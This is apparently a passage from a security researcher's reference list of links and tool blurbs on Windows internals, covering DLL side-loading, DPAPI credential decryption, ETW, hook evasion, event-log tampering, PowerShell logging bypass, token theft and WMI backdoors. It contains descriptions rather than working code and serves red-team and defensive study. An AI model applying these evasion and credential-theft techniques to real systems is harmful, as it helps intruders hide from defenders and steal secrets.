- Applications can depend on a specific version of a shared DLL and start to fail if another application is installed with a newer or older version of the same DLL. There are two ways to ensure that your application uses the correct DLL: DLL redirection and side-by-side components. Developers and administrators should use DLL redirection for existing applications, because it does not require any changes to the application. If you are creating a new application or updating an application and want to isolate your application from potential problems, create a side-by-side component.
-
Articles/Blogposts/Writeups
-
What is
*.local
file in windows ? - abcdef(2020) - Debugging DLL’s – 3 techniques to help you get started - Jean-François Maes(2020)
-
Using Pragmas to Create a Proxy DLL - Kontza(2007)
- This article explains a way to create a Proxy DLL employing the MSVC compiler
'#pragma comment'
feature.
- This article explains a way to create a Proxy DLL employing the MSVC compiler
- Quickpost: DllDemo - Didier Stevens(2017)
-
How to turn a DLL into a standalone EXE - Hasherezade(2016)
- Staying Hidden on the Endpoint: Evading Detection with Shellcode - Evan Pena, Casey Erikson
- Abusing DLL Misconfigurations — Using Threat Intelligence to Weaponize R&D - Evan Pena, Ruben Boonen, Brett Hawkins
- edgegdi.dll for persistence - Chad Duffey(2020)
- Abusing Delay Load DLLs for Remote Code Injection - Bryan Alexander(2017)
-
What is
-
Talks/Presentations/Videos
-
Memory-Based Library Loading: Someone Did That Already. - Casey Rosini(Derbycon2017)
- The technique of using memory-based library loading has been around for a number of years. It is available in different forms and for different operating systems. It has been popularized in the security-space with long-standing techniques perhaps even longer than some are aware. And here I thought that I found or did some new evasion. This talk discusses a library for Windows that is still maintained but has been seemingly overlooked for over a decade (or has it?), and how it can be used against the next-generation securing of the digitals.
-
Memory-Based Library Loading: Someone Did That Already. - Casey Rosini(Derbycon2017)
-
Tools
-
CMDLL
- the most basic DLL ever to pop a cmd.
-
DLL_to_EXE
- Converts a DLL into a ready-to-use EXE.
-
DllToShellCode
- Fast Conversion Windows Dynamic Link Library To ShellCode
-
DLLoader
- Surrogate DLL carrier for debugging purposes.
-
DLL loading shellcode
- Shellcode to load an appended Dll
-
MaliciousDLLGenerator
- DLL Generator for side loading attack
-
CMDLL
-
DLL Hijacking
- See DLL Stuff
-
DLL Hollowing
- **See DLL Hollowing
-
DLL Proxying
- **See DLL Proxying
-
101
-
DPAPI
-
101
- CNG DPAPI - docs.ms
- Data Protection API - Wikipedia
- DPAPI Secrets. Security analysis and data recovery in DPAPI - Passcape
- [Windows Data Protection - docs.ms(WinXP)](https://docs.microsoft.com/en-us/previous-versions/ms995355(v=msdn.10)
- module ~ dpapi - mimikatz
-
Articles/Blogposts/Writeups
- DPAPI Primer for Pentesters - WebstersProdigy(2013)
- Grab the Windows secrets! - decoder.cloud(2017)
- DPAPI exploitation during pentest and password cracking - Jean-Christophe Delaunay
- Happy DPAPI! - ZenaForensics
- ReVaulting! Decryption and opportunities - Reality Net System Solutions
- Windows ReVaulting - digital-forensics.it
- TBAL: an (accidental?) DPAPI Backdoor for local users - vztekoverflow
- Operational Guidance for Offensive User DPAPI Abuse - harmj0y
- Offensive Encrypted Data Storage (DPAPI edition) - harmj0y
- A Case Study in Attacking KeePass - harmj0y
- Reading DPAPI Encrypted Secrets with Mimikatz and C++ -ired.team
- Retrieving DPAPI Backup Keys from Active Directory - Michael Grafnetter
- The Blackbox of DPAPI the gift that keeps on giving - Bartosz Inglot(OPCDE2017)
-
Talks & Presentations
- The BlackBox of DPAPI: The Gift That Keeps on Giving - Bart Inglot
- DPAPI and DPAPI-NG: Decryption Toolkit - Paula Januskiewicz
-
Protecting browsers’ secrets in a domain environment - Itai Grady
- All popular browsers allow users to store sensitive data such as credentials for online and cloud services (such as social networks, email providers, and banking) and forms data (e.g. Credit card number, address, phone number) In Windows environment, most browsers (and many other applications) choose to protect these secrets by using Window Data Protection API (DPAPI), which provides an easy method to encrypt and decrypt secret data. Lately, Mimikatz, a popular pentest/hacking tool, was updated to include a functionality that allows highly-privileged attackers to decrypt all of DPAPI secrets. In this talk, I will analyze the Mimikatz Anti-DPAPI attack targeting the Domain Controller (DC) which puts all DPAPI secrets in peril and show how it can be defeated with network monitoring.
- Decrypting DPAPI data - Jean-Michel Picod, Elie Bursztein
- give me the password and I'll rule the world: dpapi, what else? - Francesco Picasso
- DPAPI exploitation during pentest and password cracking - Jean-Christophe Delaunay
-
ReVaulting! Decryption and opportunities - Francesco Picasso
- Windows credentials manager stores users’ credentials in special folders called vaults. Being able to access such credentials could be truly useful during a digital investigation for example, to gain access to other protected systems. Moreover, if data is in the cloud, there is the need to have the proper tokens to access it. This presentation will describe vaults’ internals and how they can be decrypted; the related Python Open Source code will be made publicly available. During the session, credentials and vaults coming from Windows 7, Windows 8.1 and Windows 10 will be decrypted, focusing on particular cases of interest. Finally, the presentation will address the challenges coming from Windows Phone, such as getting system-users’ passwords and obtaining users’ ActiveSync tokens.
-
Tools
-
dpapick
- DPAPIck is a forensic toolkit, written in Python and designed to easily deal with Microsoft DPAPI blob decryption in an offline and cross-platform way.
-
Windows DPAPI Lab
- My own DPAPI laboratory. Here I put some ongoing works that involve Windows DPAPI (Data Protection API). It's a lab, so something could not work: please see "How to Use".
-
The LaZagne Project
- LaZagne uses an internal Windows function called CryptUnprotectData to decrypt user passwords. This API should be called on the victim user session, otherwise, it does not work. If the computer has not been started (when the analysis is realized on an offline mounted disk), or if we do not want to drop a binary on the remote host, no passwords can be retrieved. LaZagneForensic has been created to avoid this problem. This work has been mainly inspired by the awesome work done by Jean-Michel Picod and Elie Bursztein for DPAPICK and Francesco Picasso for Windows DPAPI laboratory.
- DataProtectionDecryptor v1.06 - Nirsoft
-
dpapick
-
101
-
Device Guard
- 101 *
-
ETW
-
101
- Event Tracing - docs.ms
- About Event Tracing - docs.ms
- Using Event Tracing - docs.ms
-
Writing an Instrumentation Manifest - docs.ms(2018)
- Applications and DLLs use an instrumentation manifest to identify their instrumentation providers and the events that the providers write. A manifest is an XML file that contains the elements that identify your provider. The convention is to use .man as the extension for your manifest. The manifest must conform to the event manifest XSD.
- Event Metadata Overview - docs.ms
- ETW: Event Tracing for Windows 101 - @spothteplanet
- Introduction to Threat Intelligence ETW - NtRaiseHardError(2020)
-
Windows10EtwEvents
- Events from all manifest-based and mof-based ETW providers across Windows 10 versions
-
Articles/Blogposts/Writeups
- Logging Keystrokes with Event Tracing for Windows (ETW) - SRT Team(2016)
- Hiding Your .NET – ETW - Adam Chester(2020)
- Another method of bypassing ETW and Process Injection via ETW registration entries. - modexp(2020)
- Data Source Analysis and Dynamic Windows RE using WPP and TraceLogging - Matt Graeber(2019)
- Hidden Treasure: Intrusion Detection with ETW, Part 1 - Zac Brown(2017)
- SilkETW: Because Free Telemetry is … Free! - Ruben Boonnen
- Tampering with Windows Event Tracing: Background, Offense, and Defense - Palantir
- Getting started with Event Tracing for Windows in C# - Alex Khanin
- ETW Event Tracing for Windows and ETL Files - Nicole Ibrahim
-
Talks/Videos
- Hidden Treasure: Detecting Intrusions with ETW - Zac Brown(2017)
- Production tracing with Event Tracing for Windows (ETW) - Doug Cook(2017)
-
ETW - Monitor Anything, Anytime, Anywhere - Dina Goldshtein(NDC Oslo 2017)
- You’ll learn how to diagnose incredibly complex issues in production systems such as excessive garbage collection pauses, slow startup due to JIT and disk accesses, and even sluggishness during the Windows boot process. We will also explore some ways to automate ETW collection and analysis to build self-diagnosing applications that identify high CPU issues, resource leaks, and concurrency problems and produce alerts and reports. In the course of the talk we will use innovative performance tools that haven’t been applied to ETW before — flame graphs for visualising call stacks and a command-line interface for dynamic, scriptable ETW tracing. ETW is truly a window into everything happening on your system, and it doesn’t require expensive licenses, invasive tools, or modifying your code in any way. It is a critical, first-stop skill on your way to mastering application performance and diagnostics.
-
Tools
-
CollectDotNetEvents.ps1
- A PoC script to capture relevant .NET runtime artifacts for the purposes of potential detections
-
krabsetw
- KrabsETW provides a modern C++ wrapper and a .NET wrapper around the low-level ETW trace consumption functions.
-
PerfView
- PerfView is a free performance-analysis tool that helps isolate CPU and memory-related performance issues. It is a Windows tool, but it also has some support for analyzing data collected on Linux machines. It works for a wide variety of scenarios, but has a number of special features for investigating performance issues in code written for the .NET runtime.
-
WindowsEventLogMetadata
- Event metadata collected across all manifest-based ETW providers on Window 10 1903
- NiftyETWProviders.json
-
TLGMetadataParser.psm1
- Retrieves TraceLogging metadata from a file.
- EtwExplorer
-
SilkETW & SilkService
- SilkETW & SilkService are flexible C# wrappers for ETW, they are meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While both projects have obvious defensive (and offensive) applications they should primarily be considered as research tools. For easy consumption, output data is serialized to JSON. The JSON data can either be written to file and analyzed locally using PowerShell, stored in the Windows eventlog or shipped off to 3rd party infrastructure such as Elasticsearch.
-
WEPExplorer
- This tool is very helpful when you want to explore all the Windows Event providers installed on your system and what kind of metadata they have. The Explorer GUI sports a comprehensive filter that helps you sift through a complex provider's metadata.
-
TamperETW
- PoC to demonstrate how CLR ETW events can be tampered.
-
CollectDotNetEvents.ps1
-
101
-
Faxes & Printers
- 101
- Articles/Blogposts/Writeups
-
Fibers
- 101
- Articles/Blogposts/Writeups
-
File Extensions
- Common file name extensions in Windows - support.ms
-
File Types - docs.ms
- This topic explains how to create new file types and how to associate your app with your file type and other well-defined file types. Files with a shared common file name extension (.doc, .html, and so on) are of the same type. For example, if you create a new text editor, then you can use the existing .txt file type. In other cases, you might need to create a new file type.
- The case of the missing file extensions - NCCGroup(2014)
-
Hooking in Windows
-
101
- Bypass EDR’s memory protection, introduction to hooking
- Windows API Hooking - @spotheplanet
- The different ways of hooking - Ch40zz(2015)
- Application Introspection & Hooking With Frida - b33f
- Hooking - alphaSeclab
- Defeating Antivirus Real-time Protection From The Inside - Kuba Gretzky(2016)
- Inline Hooking for Programmers (Part 1: Introduction) - MalwareTech(2015)
- Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams - @modexpblog
-
Articles/Blogposts/Writeups
- Why Usermode Hooking Sucks – Bypassing Comodo Internet Security - George Nicalaou(2012)
-
Windows x64 System Service Hooks and Advanced Debugging - nick.p.everdox(2013)
- This article will explain how we can work alongside patchguard to hook system services in a less invasive way, but still retain the powerful aspects behind it.
- Userland API Monitoring and Code Injection Detection - dtm(2018)
- Full DLL Unhooking with C++ - @spotheplanet
- API Monitoring and Hooking for Offensive Tooling - @spotheplanet
-
Detecting Hooked Syscalls - @spotheplanet
- It's possible to enumerate which Windows API calls are hooked by an EDR using inline patcihng technique, where a jmp instruction is inserted at the beginning of the syscall stub to be hooked.
- FireWalker: A New Approach to Generically Bypass User-Space EDR Hooking - Peter Winter-Smith(2020)
- Adventures in Dynamic Evasion - Matt Hand(2020)
- User-mode API hooks and bypasses - dumpco.re(2020)
- SMOOTHPHERRET - generic hooking evasion
- Hooks-On Hoot-Off: Vitaminizing MiniDump - Adepts of 0xCC
- WOW64!Hooks: WOW64 Subsystem Internals and Hooking Techniques - Stephen Eckels(2020)
- Pushing back on userland hooks with Cobalt Strike - Ralphael Mudge(2021)
-
Talks/Presentations/Videos
- Hooking Nirvana: Stealthy Instrumentation Techniques for Windows 10 - Alex Ionescu(REcon2015)
- Rendering Ransomware Detection and EDR Products Blind - Rene Kolga(BSidesSLC 2020)
-
EPP/EDR Unhooking their protections - Daniel Feichter(DeepSec2020)
- Slides
- Enclosed you will find the video of our virtual appearance at the DeepSec 2020 about strengths and weaknesses of EPP/EDR products. In the first step, we go into the basics of the Windows OS architecture. In the second step we take a closer look at two mechanisms which can be used by EPP/EDR products under Windows. Afterwards we look at possibilities how these mechanisms can be bypassed by an attacker. And at the end we also take a short look at what defenders can do to prevent these attacks
- Papers
-
C#/.NET
- Articles/Blogposts/Writeups
-
Tools
-
DotNetHooking
- Sample use cases of the .NET native code hooking technique
-
PlayHooky
- PlayHooky is a simple C# Class that can be used to hook C# Methods at runtime. PlayHooky works on both .NET and Mono of any version, and Unity 4-5+ as long as you are running Windows x86/x64.
- Loader2
-
Open.WinKeyboardHook
- A simple and easy-to-use .NET managed wrapper for Low Level Keyboard hooking.
-
Loader1
- Nova Hook is an open source VB.NET cheat loader currently built for CS:GO
-
GlobalHook
- Simple global keyboard, mouse hook and simulation library written C#
-
DotNetHook
- A hook proof of concept with no native dependencies. Hook both .NET methods (even framework methods) and Native methods entirely in .NET.
-
MonoHook
- hook C# method at runtime without modify dll file (such as UnityEditor.dll)
-
Dendrobate
- Managed code hooking template.
-
DotNetHooking
-
EAT/IAT
- Import Adress Table (IAT) Hooking - @spotheplanet
- EAT Hooking On DLL's - Jimster480(2007)
- Import Adress Table (IAT) Hooking - @spotheplanet
-
IAT Hooking Revisited - John Leitch(2011)
- Import address table (IAT) hooking is a well documented technique for intercepting calls to imported functions. However, most methods rely on suspicious API functions and leave several easy to identify artifacts. This paper explores different ways IAT hooking can be employed while circumventing common detection mechanisms.
-
IAT patcher
- Article
- Persistent IAT hooking application (for PE files).
-
Forced-Exception
- 101
- Articles/Blogposts/Writeups
- Inline
- Interrupt Descriptor Table
- Input/Output Request Packet
-
Mini-Filters
- Articles/Blogposts/Writeups
- Msv
-
System Service Dispatch Table(SSDT)
- 101
- Articles/Blogposts/Writeups
-
Usermode APIs
- Articles/Blogposts/Writeups
-
Un-Hooking
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Tools
-
Memfuck
- MemFuck: Bypassing User-Mode Hooks - winternl.com
- A PoC designed to bypass all usermode hooks in a WoW64 environment.
-
UnhookMe
- UnhookMe is an universal Windows API resolver & unhooker addressing problem of invoking unmonitored system calls from within of your Red Teams malware
-
Memfuck
-
Tools
-
Unsorted
-
HookLib
- The functions interception library written on pure C and NativeAPI with UserMode and KernelMode support
-
APIunhooker
- C++ function that will automagically unhook a specified Windows API
- Crystal Anti-Exploit Protection 2012
-
CoreHook
- A library that simplifies intercepting application function calls using managed code and the .NET Core runtime
- NtdllUnpatcher
-
subhook
- SubHook is a super-simple hooking library for C and C++ that works on Windows, Linux and macOS. It supports x86 only (32-bit and 64-bit).
-
ddimon
- Monitoring and controlling kernel API calls with stealth hook using EPT
-
hyperbone
- Minimalistic VT-x hypervisor with hooks
-
KasperskyHook
- Hook system calls on Windows by using Kaspersky's hypervisor
- List of API Hook Libraries
-
Juno
- A Windows managed method detouring library that supports both x86 and x64 detours.
- mhook(2014)
- InfinityHook
- minhook
- PolyHook
- PolyHook 2.0
-
Probatorum EDR Userland Hook Checker
- Probatorum will check which Nt/Zw functions your local EDR is hooking. Most credit for this code goes to SolomonSklash, who has great blogs on a variety of security topics (https://www.solomonsklash.io). He wrote most of this code; I just cleaned it up a bit.
-
ScyllaHide
- Advanced usermode anti-anti-debugger.
-
HookLib
-
Unsorted
-
101
-
Windows Kernel Operations
- 101
- Articles/Blogposts/Writeups
- Tools
-
LNK Files
-
101
-
[MS-SHLLINK]: Shell Link (.LNK) Binary File Format - docs.ms
- Specifies the Shell Link Binary File Format, which contains information that can be used to access another data object. The Shell Link Binary File Format is the format of Windows files with the extension "LNK".
-
Windows Shortcut File format specification - liblnk
- This document is intended as a working document for the Windows Shortcut File (LNK) format specification. Which should allow existing Open Source forensic tooling to be able to process this file type.
-
[MS-SHLLINK]: Shell Link (.LNK) Binary File Format - docs.ms
-
Articles/Blogposts/Writeups
- You down with LNK? - Nathan Drier(2012)
- Tracking threat actors through .LNK files - Michel Conene(2017)
- .LNK downloader and bitsadmin.exe in malicious Office document - Michel Coene(2017)
- Pwned by a Shortcut - Tom Melo(2018)
- Persistence – Shortcut Modification - Pentestlab.blog(2019)
- Deep Dive: A LNK in the Chain - John Ferrell(2019)
- Analyzing the Windows LNK file attack method - 0xd3xt3r(2019)
- Suspected Sapphire Mushroom (APT-C-12) malicious LNK files - @mattnotmax(2020)
- LNK & ISESteroids Powershell dropper - Max Kersten(2020)
- The Missing LNK — Correlating User Search LNK files - Ashley Frazer(2020)
- Using Shell Links as zero-touch downloaders and to initiate network connections - Jan Kopriva(2020)
- CVE-2020-0729: Remote Code Execution Through .LNK Files - Trend Micro Research Team(2020)
- Talks/Presentations/Videos
-
Papers
-
The Meaning of Linkfiles In Forensic Examinations - Harry Parsonage(2010)
- A look at the practical value to forensic examinations of dates and times, and object identifiers in Windows shortcut files.
-
The Meaning of Linkfiles In Forensic Examinations - Harry Parsonage(2010)
- Tools
-
101
-
Logging
- See L-SM-TH.md
- Articles/Blogposts/Writeups
-
Tools
-
Invoke-Phant0m
- This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running.
-
GENE: Go Evtx sigNature Engine
- The idea behind this project is to provide an efficient and standard way to look into Windows Event Logs (a.k.a EVTX files). For those who are familiar with Yara, it can be seen as a Yara engine but to look for information into Windows Events.
- Documentation
-
LogServiceCrash
- POC code to crash Windows Event Logger Service
-
SharpCrashEventLog
- C# port of LogServiceCrash
-
EventCleaner
- A tool mainly to erase specified records from Windows event logs, with additional functionalities.
-
Invoke-Phant0m
-
MS-SQL Server
- 101
- Articles/Blogposts/Writeups
-
Tools
-
DAFT: Database Audit Framework & Toolkit
- This is a database auditing and assessment toolkit written in C# and inspired by PowerUpSQL.
-
Evil SQL Client (ESC)
- Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, b…
-
QuickSQL
- QuickSQL is a simple MSSQL query tool that allows you to connect to MSSQL databases and does not require administrative level rights to use.
-
SqlClient
- POC for .NET mssql client for accessing database data through beacon
-
DAFT: Database Audit Framework & Toolkit
- Named Pipes
-
PowerShell
-
PowerShell Logging
- 101
- Articles/Blogposts/Writeups
-
Tools
-
DisablePSLogging.cs
- One of the many ways one could disabled PS logging/AMSI if there's prior code execution.
-
DisablePSLogging.cs
-
PowerShell Profiles
-
101
- Understanding the Six PowerShell Profiles - Dr Scripto(devblogs.ms)
- About Profiles - docs.ms(2017)
- How-to: Configure the PowerShell startup profile [$Profile] - ss64.com
- Understanding different (Six and more!) PowerShell profiles - Mohit Goyal
- PowerShell for Beginners (Part 6): PowerShell Profiles and the ISE - Patrick Gruenauer
-
Articles/Blogposts/Writeups
- [Abusing PowerShell Profiles - enigma0x3(2014)(https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/)
- Investigating Subversive PowerShell Profiles - Matt Graeber(2015)
- Persistence – PowerShell Profile - PentestLab.blog(2019)
- Persistent PowerShell: The PowerShell Profile -
-
101
-
PowerShell without PowerShell
- 101
- Articles/Blogposts/Writeups
-
Custom Runspace
- Executing PowerShell scripts from C# - docs.ms
- Calling C# code in Powershell and vice versa - Karthik Kk
- How to run PowerShell Core scripts from .NET Core applications - keithbabinec(2020)
- How to execute PowerShell script or cmdlets from C# code? - Mitesh Sureja(2018)
- Project: NotPowerShell
- We don’t need powershell.exe - decoder.cloud(2017)
- Powershell CLM Bypass Using Runspaces - Shaksham Jaiswal(2019)
-
Tools
-
InsecurePowerShell
- InsecurePowershell is a fork of PowerShell Core v6.0.0, with key security features removed.
-
InsecurePowerShellHost
- InsecurePowerShellHost is a .NET Core host process for InsecurePowerShell, a version of PowerShell Core with key security features removed.
-
PowerTools
- This project focuses on allowing the execution of Powershell functionality without the use of Powershell.exe. Primarily this project uses.NET assemblies/libraries to start execution of the Powershell scripts.
-
UnmanagedPowerShell
- Executes PowerShell from an unmanaged process.
-
PowerShdll
- Run PowerShell with dlls only.
-
NoPowerShell
- NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used; only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll,main.
-
A Powerful New Tool: PowerLine - BHIS(2017)
- PowerLine
- Running into environments where the use of PowerShell is being monitored or is just flat-out disabled? Have you tried out the fantastic PowerOps framework but are wishing you could use something similar via Meterpreter, Empire, or other C2 channels? Look no further! In this talk, Brian Fehrman talks about his new PowerLine framework. He overviews the tool, walks you through how to use it, shows you how you can add additional PowerShell scripts with little effort, and demonstrates just how powerful (all pun intended) this little program can be!
-
psfire
- simple demo of using C# & System.Management.Automation.dll to run powershell code (b64 encoded) without powershell.exe
-
InsecurePowerShell
-
PowerShell Logging
-
PowerShell Desired State Configuration
- Documentation
- DSCompromised: A Windows DSC Attack Framework - Matt Hastings, Ryan Kazanciyan - BH Asia16
-
DSCompromised
- PowerShell framework for managing and infecting systems via Windows Desired State Configuration (DSC) DSC is a built-in feature in Windows Management Framework 4.0 (PowerShell v4) and is installed natively on Windows operating systems beginning with Server 2012 R2 and Windows 8.1.
-
Privileges
-
101
-
Privilege Constants (Authorization) - docs.ms
- Privileges determine the type of system operations that a user account can perform. An administrator assigns privileges to user and group accounts. Each user's privileges include those granted to the user and to the groups to which the user belongs.
-
Privilege Constants (Authorization) - docs.ms
-
101
-
Services
-
101
-
About Services - docs.ms
- The service control manager (SCM) maintains a database of installed services and driver services, and provides a unified and secure means of controlling them. The database includes information on how each service or driver service should be started. It also enables system administrators to customize security requirements for each service and thereby control access to the service.
-
Service Control Handler Function - docs.ms
- Each service has a control handler, the Handler function, that is invoked by the control dispatcher when the service process receives a control request from a service control program. Therefore, this function executes in the context of the control dispatcher.
-
About Services - docs.ms
- Articles/Blogposts/Writeups
-
Tools
-
ExploitRemotingService
- A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects might work in Mono on
*nix
.
- A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects might work in Mono on
-
ExploitRemotingService
-
101
-
Windows Privileges & Tokens
-
101
- Access token - Wikipedia
-
Access Tokens - docs.ms
- An access token is an object that describes the security context of a process or thread. The information in a token includes the identity and privileges of the user account associated with the process or thread. When a user logs on, the system verifies the user's password by comparing it with information stored in a security database. If the password is authenticated, the system produces an access token. Every process executed on behalf of this user has a copy of this access token. The system uses an access token to identify the user when a thread interacts with a securable object or tries to perform a system task that requires privileges.
- Credentials Processes in Windows Authentication - docs.ms
- How Access Tokens Work - docs.ms
-
Articles/Blogposts/Writeups
- Introduction to Windows tokens for security practitioners - Will Burgess(2020)
- [About Windows Process/Thread Tokens and Pass The Hash - Kevin Dick(2019)]
- Windows Privilege Abuse: Auditing, Detection, and Defense - Palantir(2019)
- Token Manipulation Attacks (Part 1: Introduction to Tokens and Privileges) - Susan Ghosh(2019)
-
Give Me Back My Privileges! Please? - itm4n(2019)
- I want to tell you the story of a service account which lost all its powers (a.k.a. privileges). Windows world is getting increasingly ruthless and when the system considers you are not worthy, this is what happens. Fortunately for our service account, all is not lost, there’s still hope. In this merciless world, you can always turn to the old sages to find some comfort and support. Among them, the Task Scheduler might be willing to help and restore what was lost, provided that you ask kindly…
- Accessing Access Tokens for UIAccess - James Forshaw(2019)
- Sharing a Logon Session a Little Too Much - James Forshaw(2020)
- Understanding and Abusing Process Tokens — Part I - seemant bisht(2020)
- The impersonation game - decoder.cloud(2020)
- Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N) - James Forshaw(2020)
- Game Over Privileges - Acebond(2020)
-
Talks/Presentations/Videos
-
Abusing Access Tokens for UAC Bypasses - James Forshaw(ZeroNights18)
- UAC, specifically Admin-Approval mode, has been known to be broken ever since it was first released in Windows Vista. Most of the research of bypassing UAC has focused on abusing bad elevated application behavior, auto elevation or shared registry and file resources. However, UAC was fundamentally broken from day one due to the way Microsoft implemented the security around elevated processes, especially their access tokens. This presentation will go into depth on why this technique works, allowing you to silently gain administrator privileges if a single elevated application is running. It will describe how Microsoft tried to fix it in Windows 10, and how you can circumvent their defences. It will also go into detail on a previously undocumented technique to abuse the assumed, more secure, Over-The-Shoulder elevation on Windows 10.
-
Understanding Windows Access Token Manipulation - Justin Bui(Hushcon2019)
- Finding alternatives to winlogon.exe to steal SYSTEM access tokens from.
-
The Backup Operators Guide to the Galaxy - Dave Mayer
- Backup Operator accounts are ubiquitous and often overlooked by both blue and red teams.These accounts have abusable permissions and are rarely maintained properly.In this talk we will examine and demonstrate novel techniques to stealthily compromise Active Directory through the Backup Operator?s account.We will use the Backup Operator account to gain local Admin privilege, establish persistence, and pivot laterally throughout a domain.However, all is not lost in that we can further lockdown our systems and enable auditing measures to deter and detect these attacks.
-
Abusing Access Tokens for UAC Bypasses - James Forshaw(ZeroNights18)
- Papers
-
Tools
-
PrimaryTokenTheft
- Steal a primary token and spawn cmd.exe using the stolen token.
- One Token to Rule Them All: Post-Exploitation Fun in Windows Environments - Luke Jennings
- Token Kidnapping's Revenge -
-
FullPowers
- FullPowers is a Proof-of-Concept tool I made for automatically recovering the default privilege set of a service account including SeAssignPrimaryToken and SeImpersonate.
-
PrimaryTokenTheft
-
101
-
Windows Communication Foundation
- 101
-
Articles/Blogposts/Writeups
- Windows Communication Foundation(WCF) FAQ: Part I - Shivprasd(C#Corner)
- Abusing Insecure Windows Communication Foundation (WCF) Endpoints - Fabius Watson
- Exploitation of Remote WCF Vulnerabilities - Versprite
- Abusing WCF Endpoints for Fun and Profit
- Finding and Exploiting .NET Remoting over HTTP using Deserialisation - Sorush Dalili
- Talks/Presentations/Videos
-
Windows Management Instrumentation
- 101
-
Official Documentation
- WMI Reference - docs.ms
- Introduction to CIM Cmdlets - MS
- A Description of the Windows Management Instrumentation (WMI) Command-Line Utility (Wmic.exe) - support.ms
- wmic - docs.ms
- WMIC - Take Command-line Control over WMI - docs.ms
- Using Windows Management Instrumentation Command-line - docs.ms(2009)
- WMI Classes - docs.ms
- Access to WMI Namespaces - docs.ms
- WMI Tasks: Accounts and Domains - docs.ms
- WMI Tasks -- Services - docs.ms
- WMI Tasks: Files and Folders - docs.ms
- Search for files using WMI - Jaap Brasser
- Using the PowerShell CIM cmdlets for fun and profit - Dr Scripto
- Use PowerShell and WMI to Get Processor Information - Dr Scripto
- Using the Get-Member Cmdlet - docs.ms
- Get-Process - docs.ms
-
General
- (Book) Understanding WMI Scripting: Exploiting Microsoft's Windows Management Instrumentation in Mission-Critical Computing Infrastructures - Alain Lissoir
-
Articles/Blogposts/Writeups
- Examples of WMIC commands for Windows .NET SERVER Family - cs.cmu.edu(2002)
- WMIC Command Line Kung-Fu - tech-wreck.blogspot.com(2009)
- WMIS: The Missing Piece of the Ownage Puzzle - Christopher Campbell, Exorcyst(2013)
- PowerShell and Events: WMI Temporary Event Subscriptions - Boe Prox(2013)
- Introduction to WMI Basics with PowerShell Part 1 (What it is and exploring it with a GUI) - Carlos Perez(2013)
- Thoughts on Exploiting a Remote WMI Query Vulnerability - Matt Graeber(2015)
-
WMI Process Watcher - Vault7 Leaks
- A technique to asynchronously detect when a process is created using WMI.
- WMI object correlation using 'ASSOCIATORS OF'- Matt Graeber(2015)
- Creeping on Users with WMI Events: Introducing PowerLurk - Sw4mp_f0x(2016)
- A Brief Usage Guide for Wmic - xorrior(2016)
- Getting Started with WMI Weaponization – Part 2 - Alexander Leary
- Getting Started with WMI Weaponization – Part 5 - Alexander Leary(2017)
- Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY) - Matthew Dunwoody(2017)
- Lateral Movement Using WinRM and WMI - Tony Lambert(2017)
- Post Exploitation Using WMIC (System Command) - hackingarticles.in(2018)
- Windows Userland Persistence Fundamentals - FuzzySecurity
- Detecting & Removing an Attacker’s WMI Persistence - David French(2018)
- An intro into abusing and identifying WMI Event Subscriptions for persistence - @rebootuser(2019)
- Papers
-
Presentations/Talks/Videos
- WMI AttacksFrom Theory To Practice -
-
Abusing Windows Management Instrumentation (WMI) - Matthew Graeber(BH USA 2015)
- Imagine a technology that is built into every Windows operating system going back to Windows 95, runs as System, executes arbitrary code, persists across reboots, and does not drop a single file to disk. Such a thing does exist and it's called Windows Management Instrumentation (WMI). With increased scrutiny from anti-virus and 'next-gen' host endpoints, advanced red teams and attackers already know that the introduction of binaries into a high-security environment is subject to increased scrutiny. WMI enables an attacker practicing a minimalist methodology to blend into their target environment without dropping a single utility to disk. WMI is also unlike other persistence techniques in that rather than executing a payload at a predetermined time, WMI conditionally executes code asynchronously in response to operating system events. This talk will introduce WMI and demonstrate its offensive uses. We will cover what WMI is, how attackers are currently using it in the wild, how to build a full-featured backdoor, and how to detect and prevent these attacks from occurring.
-
Building Better Backdoors with WMI - Alexander Leary(Derbycon2017)
- This presentation will provide a brief overview of WMI, and how creating WMI providers can be leveraged to create a reliable and covert persistence mechanism for offensive security professionals to use.
-
Basic Offensive Application of MOF Files in WMI Scripting - Devon Bordonaro(BSidesCharm2018)
- A basic introduction on how to use MOF files and the Windows Management Instrumentation (WMI) database to alter how programs execute and implement your own processes. Join us for a walkthrough of MOF design and an overview of the vulnerabilities presented by the WMI database. Finally, learn how the hardest part of using MOF files is making yourself known to the user.
-
Fud WMI for lateral movement (PoC) - ##BsidesDub 2019##
- This repository contains the PowerShell WMI based Proof of Concept for advanced lateral movement as presented at BsidesDub 2019.The main goal of this project was to demonstrate the techniques an attacker might use to bypass detection mechanisms using many techniques in real-life condition.It implement random class name derivation mechanism, payload obfuscation, in-memory execution without any call to IEX nor IWR for the stage 1 dropper and an EventViewer logs removal through WMI un-subscription method.
- Reference
-
Tools
-
WMI_Backdoor
- A PoC WMI backdoor presented at Black Hat 2015
-
cme-wmi
- Experimental plugin for CrackMapExec that adds a new protocol based on pure WMI : all of CrackMapExec's traffic passes via DCOM (TCP/135 and dynamic ports).
-
WMIOps
- This repo is for WMIOps, a powershell script which uses WMI for various purposes across a network.
-
WMImplant
- This is a PowerShell based tool that is designed to act like a RAT. Its interface is that of a shell where any command that is supported is translated into a WMI-equivalent for use on a network/remote machine. WMImplant is WMI based.
-
WMI_Backdoor
-
Windows Notification Facility
- 101
